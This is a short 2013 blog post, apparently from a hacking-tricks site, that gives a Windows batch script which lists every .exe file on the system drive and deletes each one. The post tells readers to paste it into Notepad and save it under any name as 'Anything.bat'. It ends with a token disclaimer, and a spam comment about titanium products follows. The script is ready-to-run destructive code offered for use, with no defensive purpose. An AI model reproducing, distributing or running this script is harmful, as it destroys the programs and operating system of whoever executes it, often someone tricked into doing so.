Saturday 4 May 2013

Delete All .EXE Files On The Computer

Method :

1. Open Notepad

2. Copy the code given below


Code:
@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------

3. Save as "Anything.bat"

Warning :
Do not try this at your own computer. I will not be responsible for any damages caused to your computer.

1 comments:

  1. Titanium nail art design | TheTitaniumArts.com
    ‎Thetitanium Art titaum · ‎Titanium camillus titanium Artists · ‎Titanium titanium vs ceramic Artworks · ‎The Art of The titanium water bottle Art of the Craft tecate titanium

    ReplyDelete